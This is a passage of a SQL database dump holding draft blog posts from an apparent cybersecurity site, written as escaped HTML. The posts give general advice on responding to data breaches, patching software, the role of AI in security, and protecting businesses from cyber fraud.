style=\"font-weight: 400\"><span style=\"font-weight: 400\">The type of data compromised</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">The methods used by attackers</span><span style=\"font-weight: 400\">\r\n</span><span style=\"font-weight: 400\">Forensic experts can analyze logs, backup data, and system images to gather evidence.</span></li>\r\n</ul>\r\n<h2><span style=\"font-weight: 400\">4. Notify Affected Parties</span></h2>\r\n<span style=\"font-weight: 400\">Transparency is crucial during a data breach:</span>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Notify affected individuals promptly if their personal information was compromised.</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Provide clear instructions on how they can protect themselves (e.g., monitoring credit reports).</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Comply with legal requirements such as GDPR or HIPAA regarding breach notifications.</span></li>\r\n</ul>\r\n<h2><span style=\"font-weight: 400\">5. Remediate Vulnerabilities</span></h2>\r\n<span style=\"font-weight: 400\">Address the root cause of the breach by:</span>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Patching vulnerabilities in software or systems.</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Strengthening access controls (e.g., implementing multi-factor authentication).</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Updating security policies based on lessons learned from the incident.</span></li>\r\n</ul>\r\n<h2><span style=\"font-weight: 400\">6. Communicate Effectively</span></h2>\r\n<span style=\"font-weight: 400\">Develop a communication plan that includes:</span>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Internal updates for employees and management</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Public statements for customers and media</span><span style=\"font-weight: 400\">\r\n</span><span style=\"font-weight: 400\">Avoid withholding information that could help stakeholders protect themselves but also ensure accuracy in your messaging.</span></li>\r\n</ul>\r\n<h2><span style=\"font-weight: 400\">Preventing Future Data Breaches</span></h2>\r\n<span style=\"font-weight: 400\">Prevention is always better than cure. Here are some best practices:</span>\r\n<ol>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Implement Strong Access Controls: Use multi-factor authentication (MFA) and role-based permissions to limit access to sensitive data.</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Regularly Update Software: Ensure all systems are patched promptly to close security gaps.</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Educate Employees: Train staff on recognizing phishing attempts and other common threats.</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Encrypt Sensitive Data: Use encryption both at rest and in transit to protect valuable information even if stolen.</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Conduct Security Audits: Regularly test your systems for vulnerabilities through penetration testing and risk assessments.</span></li>\r\n</ol>\r\n<span style=\"font-weight: 400\">Detecting and responding to a data breach requires vigilance, preparation, and swift action. By monitoring your systems proactively, recognizing early warning signs, and having a well-prepared response plan in place, you can minimize the impact of breaches when they occur.</span>\r\n\r\n<span style=\"font-weight: 400\">Learning from real-world incidents like Equifax or SolarWinds highlights the importance of staying ahead in cybersecurity efforts through regular updates, employee training, and robust incident response strategies.</span>\r\n\r\n<span style=\"font-weight: 400\">In today’s interconnected world, it’s not just about whether you’ll face a breach but how prepared you are when it happens. Take these steps seriously—your organization’s reputation and financial stability may depend on it!</span>', '', NULL, NULL, 1, 'draft', '2024-12-07 16:39:18', '2026-01-12 21:41:44', 'Information Security', 'How to Detect and Respond to a Data Breach: A Comprehensive Guide', '', NULL),
(93, 'The Importance of Regular Software Updates: Lessons from Real-World Cyber Attacks', 'the-importance-of-regular-software-updates', '<span style=\"font-weight: 400\">The importance of regular software updates cannot be overstated. As cyber threats continue to evolve and become more sophisticated, keeping software up-to-date has become a critical aspect of cybersecurity. This article explores the significance of software updates and presents real-life examples of attacks that exploited outdated software, demonstrating the severe consequences of neglecting this crucial practice.</span>\r\n<h3><strong>Understanding the Importance of Software Updates</strong></h3>\r\n<span style=\"font-weight: 400\">Regular software updates serve multiple purposes:</span>\r\n<ol>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Patching Security Vulnerabilities: Updates often include security patches that address known vulnerabilities, effectively closing potential entry points for </span><span style=\"margin: 0px;padding: 0px\">cybercriminals</span><span style=\"font-weight: 400\">.</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Enhancing Performance: Many updates contain performance optimizations that improve system efficiency and stability</span><span style=\"font-weight: 400\">.</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Ensuring Compatibility: Updates help maintain compatibility with new hardware, operating systems, and other applications</span><span style=\"font-weight: 400\">.</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Adding New Features: Software updates frequently introduce new functionalities, improving user experience without the need for new software purchases</span><span style=\"font-weight: 400\">.</span></li>\r\n</ol>\r\n<h3><strong>The Risks of Outdated Software</strong></h3>\r\n<span style=\"font-weight: 400\">Failing to update software regularly exposes individuals and organizations to significant risks:</span>\r\n<ol>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Increased Vulnerability to Cyberattacks: Outdated software is an easy target for hackers who exploit known </span><span style=\"margin: 0px;padding: 0px\">vulnerabilities</span><span style=\"font-weight: 400\">.</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Data Breaches: Unpatched vulnerabilities can lead to unauthorized access and theft of sensitive </span><span style=\"margin: 0px;padding: 0px\">information</span><span style=\"font-weight: 400\">.</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">System Instability: Outdated software may cause compatibility issues, reduced performance, and system crashes</span><span style=\"font-weight: 400\">.</span></li>\r\n</ol>\r\n<span style=\"font-weight: 400\">Compliance Issues: In some industries, running outdated software may violate regulatory </span><span style=\"margin: 0px;padding: 0px\">requirements</span><span style=\"font-weight: 400\"><span style=\"font-weight: 400\">.\r\n\r\n</span></span>\r\n<h3 id=\"types-of-security-vulnerabilities\">Types of Security Vulnerabilities</h3>\r\nSoftware updates often patch security flaws that hackers exploit. These vulnerabilities can include:\r\n<ul>\r\n 	<li style=\"list-style-type: none\">\r\n<ul>\r\n 	<li><strong>Malware</strong>: Harmful software designed to damage your system.</li>\r\n 	<li><strong>Ransomware</strong>: A type of malware that locks you out of your files until you pay a ransom.</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n<h2><strong>Real-Life Examples of Attacks Exploiting Outdated Software</strong></h2>\r\n<h3><strong>1. The Equifax Data Breach (2017)</strong></h3>\r\n<span style=\"font-weight: 400\">One of the most infamous examples of the consequences of neglecting software updates is the Equifax data breach of 2017</span><span style=\"font-weight: 400\">.</span>\r\n\r\n<span style=\"font-weight: 400\">What Happened: Equifax, one of the largest credit reporting agencies in the United States, suffered a massive data breach that exposed the personal information of approximately 147 million people.</span>\r\n\r\n<span style=\"font-weight: 400\">The Cause: The breach was attributed to a known vulnerability in the Apache Struts web application framework. Despite a patch being available for months, Equifax had failed to update their systems.</span>\r\n\r\n<span style=\"font-weight: 400\">The Impact: The breach resulted in the exposure of sensitive personal data, including:</span>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Names</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Social Security numbers</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Birth dates</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Addresses</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Driver\'s license numbers</span></li>\r\n</ul>\r\n<span style=\"font-weight: 400\">This incident led to significant financial losses for Equifax, damaged its reputation, and resulted in numerous legal actions against the company.</span>\r\n<h3><strong>2. WannaCry Ransomware Attack (2017)</strong></h3>\r\n<span style=\"font-weight: 400\">The WannaCry ransomware attack of 2017 is another stark example of the dangers posed by outdated software</span><span style=\"font-weight: 400\">.</span>\r\n\r\n<span style=\"font-weight: 400\">What Happened: This global cyberattack affected over 200,000 computers across 150 countries.</span>\r\n\r\n<span style=\"font-weight: 400\">The Cause: WannaCry exploited a vulnerability in older versions of Microsoft Windows, particularly those that were no longer supported or hadn\'t been updated.</span>\r\n\r\n<span style=\"font-weight: 400\">The Impact: The attack had far-reaching consequences:</span>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Encrypted data on infected computers, demanding ransom payments in Bitcoin</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Disrupted critical services, including healthcare systems in the UK\'s National Health Service</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Caused estimated damages of billions of dollars worldwide</span></li>\r\n</ul>\r\n<span style=\"font-weight: 400\">This incident highlighted the importance of not only keeping software updated but also discontinuing the use of unsupported operating systems.</span>\r\n<h3><strong>3. Microsoft Exchange Server Attack (2021)</strong></h3>\r\n<span style=\"font-weight: 400\">A more recent example demonstrates that even major tech companies can fall victim to attacks exploiting outdated software</span><span style=\"font-weight: 400\">.</span>\r\n\r\n<span style=\"font-weight: 400\">What Happened: In early 2021, a group of hackers launched a widespread attack on Microsoft Exchange email servers, affecting over 30,000 organizations in the United States and 60,000 globally.</span>\r\n\r\n<span style=\"font-weight: 400\">The Cause: The attackers exploited four zero-day vulnerabilities in Microsoft Exchange Server software.</span>\r\n\r\n<span style=\"font-weight: 400\">The Impact: The breach allowed hackers to:</span>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Gain unauthorized access to email accounts</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Install malware</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Potentially exfiltrate sensitive data</span></li>\r\n</ul>\r\n<span style=\"font-weight: 400\">This attack particularly affected small businesses, local governments, and organizations using on-premises Exchange servers.</span>\r\n<h3><strong>4. Home Depot Data Breach (2014)</strong></h3>\r\n<span style=\"font-weight: 400\">The Home Depot breach of 2014 illustrates how outdated software can lead to massive financial and reputational </span><span style=\"margin: 0px;padding: 0px\">damage</span><span style=\"font-weight: 400\">.</span>\r\n\r\n<span style=\"font-weight: 400\">What Happened: Hackers infiltrated Home Depot\'s point-of-sale (POS) systems and stole customer payment information over a period of five months.</span>\r\n\r\n<span style=\"font-weight: 400\">The Cause: The attackers exploited a vulnerability in a third-party vendor\'s system to gain initial access, then installed custom-built malware on Home Depot\'s POS systems.</span>\r\n\r\n<span style=\"font-weight: 400\">The Impact: The breach resulted in:</span>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Theft of 56 million payment card numbers</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Compromise of 53 million email addresses</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\"><span style=\"font-weight: 400\">Significant financial losses and damage to Home Depot\'s reputation</span></span></li>\r\n</ul>\r\n<span style=\"font-weight: 400\">These real-life examples underscore the critical importance of regular software updates in maintaining robust cybersecurity. They demonstrate that neglecting updates can lead to severe consequences, including data breaches, financial losses, and reputational damage.</span>\r\n\r\n<span style=\"font-weight: 400\">To mitigate these risks, organizations and individuals should:</span>\r\n<ol>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Implement a robust patch management strategy</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Regularly check for and install software updates</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Use automatic update features when available</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Educate employees about the importance of software updates</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Consider using patch management tools to streamline the update process</span></li>\r\n</ol>\r\n<span style=\"font-weight: 400\">By prioritizing regular software updates, we can significantly reduce the risk of falling victim to cyberattacks and ensure a more secure digital environment.</span>', '', NULL, NULL, 1, 'draft', '2024-12-06 14:56:43', '2026-01-12 21:41:44', 'Information Security', 'The Importance of Regular Software Updates: Lessons from Real-World Cyber Attacks', '', NULL),
(94, 'The Impact of AI on Cybersecurity', 'the-impact-of-ai-on-cybersecurity', 'Cybersecurity has become a critical concern for individuals and organizations alike. As cyber threats evolve and become more sophisticated, the role of Artificial Intelligence (AI) in strengthening our digital defenses has grown increasingly important. This article explores the significant impact of AI on cybersecurity, offering insights for those new to the field.\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">Understanding AI in Cybersecurity</h3>\r\nArtificial Intelligence refers to computer systems that can perform tasks that typically require human intelligence. In the context of cybersecurity, AI plays a crucial role in detecting, preventing, and responding to cyber threats\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">Key Benefits of AI in Cybersecurity</h3>\r\n<ol>\r\n 	<li><strong>Enhanced Threat Detection</strong>: AI-powered systems can identify potential threats more quickly and accurately than traditional methods</li>\r\n 	<li><strong>Automated Response</strong>: AI can automatically respond to detected threats, minimizing the time between detection and action</li>\r\n 	<li><strong>Behavioral Analytics</strong>: AI analyzes user behavior and network traffic to identify unusual activities that may signal a security breach</li>\r\n 	<li><strong>Reduced False Positives</strong>: Advanced AI algorithms can more accurately differentiate between genuine threats and harmless anomalies</li>\r\n 	<li><strong>Predictive Analysis</strong>: AI can predict potential vulnerabilities and risks before they occur, allowing for proactive security measures</li>\r\n</ol>\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">How AI Strengthens Cybersecurity</h3>\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">Real-Time Threat Detection</h3>\r\nAI-powered cybersecurity systems can learn and adapt over time, recognizing patterns and spotting deviations from the norm in real-time. This capability allows for faster identification of both known and unknown threats, giving organizations an edge over cybercriminals.\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">Network Security Management</h3>\r\nAI excels at monitoring and analyzing vast amounts of network traffic, a task that would be overwhelming for human security experts. By automating this process, AI can:\r\n<ul class=\"marker:text-textOff list-disc pl-8\">\r\n 	<li>Track internal and external threats</li>\r\n 	<li>Detect anomalies in user behavior</li>\r\n 	<li>Manage endpoint lifecycle</li>\r\n 	<li>Perform regular security audits</li>\r\n</ul>\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">Vulnerability Management</h3>\r\nAI systems can continuously scan IT ecosystems for vulnerabilities, assess existing security measures, and prioritize remediation efforts. This proactive approach helps organizations stay ahead of potential security breaches.\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">Phishing Detection</h3>\r\nAI enhances email filters by analyzing text patterns to flag suspicious emails and block various types of spam.  This is particularly crucial as phishing attacks become increasingly sophisticated and harder to detect.\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">Challenges and Risks</h3>\r\nWhile AI offers numerous benefits to cybersecurity, it\'s important to be aware of potential challenges:\r\n<ol class=\"marker:text-textOff list-decimal pl-8\">\r\n 	<li><strong>AI-Powered Attacks</strong>: Cybercriminals can also leverage AI to develop more complex and evasive attack methods</li>\r\n 	<li><strong>False Sense of Security</strong>: Over-reliance on AI systems may lead to complacency in other areas of cybersecurity</li>\r\n 	<li><strong>Data Privacy Concerns</strong>: AI systems require vast amounts of data to function effectively, which may raise privacy issues</li>\r\n 	<li><strong>Skill Gap</strong>: The integration of AI in cybersecurity demands new skills from security professionals</li>\r\n</ol>\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">The Future of AI in Cybersecurity</h3>\r\nAs AI technology continues to evolve, its role in cybersecurity is expected to grow. Future developments may include:\r\n<ul class=\"marker:text-textOff list-disc pl-8\">\r\n 	<li>More sophisticated predictive models for threat detection</li>\r\n 	<li>Enhanced automation of security processes</li>\r\n 	<li>Improved ability to detect and respond to zero-day vulnerabilities</li>\r\n 	<li>Greater integration of AI across all aspects of cybersecurity</li>\r\n</ul>\r\nThe impact of AI on cybersecurity is profound and far-reaching. For those new to cybersecurity, understanding the role of AI is crucial in navigating the complex digital landscape. While AI offers powerful tools for enhancing security, it\'s important to remember that it\'s not a silver bullet. A comprehensive cybersecurity strategy should combine AI capabilities with human expertise and traditional security measures.', '', NULL, NULL, 1, 'draft', '2024-12-05 23:11:13', '2026-01-12 21:41:44', 'OSINT Tool', 'The Impact of AI on Cybersecurity', '', NULL),
(95, 'How to Protect Your Business from Cyber Fraud', 'how-to-protect-your-business-from-cyber-fraud', '<span style=\"font-weight: 400\">Protecting your business from cyber fraud has become more crucial than ever. As technology advances, so do the tactics of cybercriminals, making it essential for businesses of all sizes to implement robust security measures. This comprehensive guide will explore various strategies and best practices to safeguard your business against cyber threats, ensuring the protection of your valuable data, financial assets, and reputation.</span>\r\n<h2><span style=\"font-weight: 400\">Understanding Cyber Fraud</span></h2>\r\n<span style=\"font-weight: 400\">Cyber fraud encompasses a wide range of malicious activities aimed at exploiting vulnerabilities in digital systems for financial gain or to cause disruption. Common types of cyber fraud include:</span>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Phishing attacks</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Malware infections</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Ransomware</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Business email compromise (BEC)</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Data breaches</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Identity theft</span></li>\r\n</ul>\r\n<span style=\"font-weight: 400\">These threats can lead to significant financial losses, damage to reputation, and legal consequences for businesses that fail to protect themselves adequately.</span>\r\n<h2><span style=\"font-weight: 400\">Essential Steps to Protect Your Business</span></h2>\r\n<h2><span style=\"font-weight: 400\">1. Know Your Data</span></h2>\r\n<span style=\"font-weight: 400\">Understanding the nature and amount of data your business handles is crucial for effective protection</span><a href=\"https://www.myknowledgebroker.com/blog/11-steps-to-protect-your-business-from-cyber-crime\"><span style=\"font-weight: 400\">1</span></a><span style=\"font-weight: 400\">. Conduct a thorough inventory of your digital assets, including:</span>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Customer information</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Financial records</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Intellectual property</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Employee data</span></li>\r\n</ul>\r\n<span style=\"font-weight: 400\">By identifying your most valuable and sensitive data, you can prioritize your security efforts and allocate resources more effectively.</span>\r\n<h2><span style=\"font-weight: 400\">2. Implement Robust Backup Systems</span></h2>\r\n<span style=\"font-weight: 400\">Creating regular backups of your business data is essential for recovery in case of a cyber attack or system failure</span><a href=\"https://www.myknowledgebroker.com/blog/11-steps-to-protect-your-business-from-cyber-crime\"><span style=\"font-weight: 400\">1</span></a><span style=\"font-weight: 400\">. Consider the following backup strategies:</span>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Implement automated backup systems</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Store backups in secure, off-site locations</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Use cloud storage solutions for added redundancy</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Regularly test your backup and recovery processes</span></li>\r\n</ul>\r\n<span style=\"font-weight: 400\">Ensure that your backup systems are also protected with strong encryption and access controls to prevent unauthorized access.</span>\r\n<h2><span style=\"font-weight: 400\">3. Train Employees in Security Principles</span></h2>\r\n<span style=\"font-weight: 400\">Your employees are often the first line of defense against cyber threats. Implement comprehensive security training programs that cover:</span>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Recognizing phishing attempts and social engineering tactics</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Creating and managing strong passwords</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Safe internet browsing practices</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Proper handling of sensitive information</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Reporting suspicious activities or potential security breaches</span></li>\r\n</ul>\r\n<span style=\"font-weight: 400\">Regular training sessions and simulated phishing exercises can help reinforce good security habits among your staff.</span>\r\n<h2><span style=\"font-weight: 400\">4. Secure Your Network Infrastructure</span></h2>\r\n<span style=\"font-weight: 400\">A well-secured network is crucial for protecting your business from cyber attacks. Implement the following measures:</span>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Install and maintain robust firewalls</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Use virtual private networks (VPNs) for remote access</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Segment your network to isolate sensitive systems</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Regularly update and patch all network devices and software</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Implement intrusion detection and prevention systems (IDS/IPS)</span></li>\r\n</ul>\r\n<span style=\"font-weight: 400\">Consider working with IT security professionals to assess and strengthen your network security posture</span><a href=\"https://www.fcc.gov/communications-business-opportunities/cybersecurity-small-businesses\"><span style=\"font-weight: 400\">2</span></a><span style=\"font-weight: 400\">.</span>\r\n<h2><span style=\"font-weight: 400\">5. Implement Strong Access Controls</span></h2>\r\n<span style=\"font-weight: 400\">Limiting access to sensitive information and systems is crucial for preventing unauthorized data breaches. Implement the following access control measures:</span>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Use the principle of least privilege, granting employees only the access they need</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Implement multi-factor authentication (MFA) for all accounts</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Regularly review and update user access rights</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Use strong, unique passwords for all accounts</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Implement a robust password management system</span></li>\r\n</ul>\r\n<span style=\"font-weight: 400\">Regularly audit your access controls to ensure they remain effective and up-to-date.</span>\r\n<h2><span style=\"font-weight: 400\">6. Secure Mobile Devices</span></h2>\r\n<span style=\"font-weight: 400\">With the increasing use of mobile devices in business operations, it\'s essential to implement a comprehensive mobile device management (MDM) strategy:</span>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Require strong passwords or biometric authentication on all devices</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Implement remote wipe capabilities for lost or stolen devices</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Use mobile device encryption</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Restrict the installation of unauthorized apps</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Regularly update and patch mobile operating systems and applications</span></li>\r\n</ul>\r\n<span style=\"font-weight: 400\">Educate employees on the importance of mobile security and the potential risks associated with using personal devices for work purposes.</span>\r\n<h2><span style=\"font-weight: 400\">7. Protect Your Wi-Fi Networks</span></h2>\r\n<span style=\"font-weight: 400\">Secure Wi-Fi networks are essential for preventing unauthorized access to your business systems. Implement the following measures:</span>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Use strong encryption (WPA3 or WPA2) for all wireless networks</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Change default router passwords and SSIDs</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Hide your network SSID from public view</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Implement a separate guest network for visitors</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Regularly update router firmware</span></li>\r\n</ul>\r\n<span style=\"font-weight: 400\">Consider implementing network access control (NAC) solutions to further enhance your Wi-Fi security.</span>\r\n<h2><span style=\"font-weight: 400\">8. Implement Email Security Measures</span></h2>\r\n<span style=\"font-weight: 400\">Email remains a primary vector for cyber attacks. Protect your business email systems by:</span>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Implementing spam filters and anti-phishing tools</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Using email encryption for sensitive communications</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Educating employees on identifying and reporting suspicious emails</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Implementing sender policy framework (SPF) and domain-based message authentication, reporting, and conformance (DMARC) protocols</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Regularly backing up email data</span></li>\r\n</ul>\r\n<span style=\"font-weight: 400\">Consider using advanced email security solutions that leverage artificial intelligence and machine learning to detect and prevent sophisticated email-based threats.</span>\r\n<h2><span style=\"font-weight: 400\">9. Develop a Comprehensive Cybersecurity Policy</span></h2>\r\n<span style=\"font-weight: 400\">Create a detailed cybersecurity policy that outlines:</span>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Acceptable use of company systems and data</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Password requirements and management practices</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Incident response procedures</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Data handling and privacy guidelines</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Remote work security protocols</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Third-party vendor security requirements</span></li>\r\n</ul>\r\n<span style=\"font-weight: 400\">Regularly review and update your cybersecurity policy to address emerging threats and changing business needs.</span>\r\n<h2><span style=\"font-weight: 400\">10. Implement Endpoint Protection</span></h2>\r\n<span style=\"font-weight: 400\">Secure all devices that connect to your network, including computers, laptops, smartphones, and IoT devices:</span>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Install and maintain up-to-date antivirus and anti-malware software</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Implement endpoint detection and response (EDR) solutions</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Use application whitelisting to prevent unauthorized software execution</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Regularly patch and update all endpoint devices and applications</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Implement disk encryption on all devices storing sensitive data</span></li>\r\n</ul>\r\n<span style=\"font-weight: 400\">Consider using unified endpoint management (UEM) solutions to centralize control and security of all your endpoints.</span>\r\n<h2><span style=\"font-weight: 400\">11. Secure Your E-commerce Platform</span></h2>\r\n<span style=\"font-weight: 400\">If your business engages in online sales, securing your e-commerce platform is crucial:</span>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Choose a reputable e-commerce platform with built-in security features</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Implement SSL/TLS encryption for all transactions</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Use a secure payment gateway that complies with PCI DSS standards</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Regularly update and patch your e-commerce software</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Implement strong authentication for admin access to your e-commerce platform</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Regularly monitor for suspicious activities or unauthorized changes</span></li>\r\n</ul>\r\n<span style=\"font-weight: 400\">Consider working with a cybersecurity expert to perform regular security assessments of your e-commerce infrastructure.</span>\r\n<h2><span style=\"font-weight: 400\">12. Develop an Incident Response Plan</span></h2>\r\n<span style=\"font-weight: 400\">Despite your best efforts, security incidents may still occur. Develop a comprehensive incident response plan that outlines:</span>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Roles and responsibilities during a security incident</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Steps for containing and mitigating the impact of a breach</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Communication protocols for notifying stakeholders and authorities</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Procedures for preserving evidence for forensic analysis</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Steps for recovery and returning to normal operations</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Lessons learned and improvement processes</span></li>\r\n</ul>\r\n<span style=\"font-weight: 400\">Regularly test and update your incident response plan through tabletop exercises and simulations.</span>\r\n<h2><span style=\"font-weight: 400\">13. Stay Informed About Emerging Threats</span></h2>\r\n<span style=\"font-weight: 400\">The cybersecurity landscape is constantly evolving. Stay informed about the latest threats and vulnerabilities by:</span>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Subscribing to cybersecurity newsletters and threat intelligence feeds</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Participating in industry-specific information sharing forums</span></li>\r\n 	<li 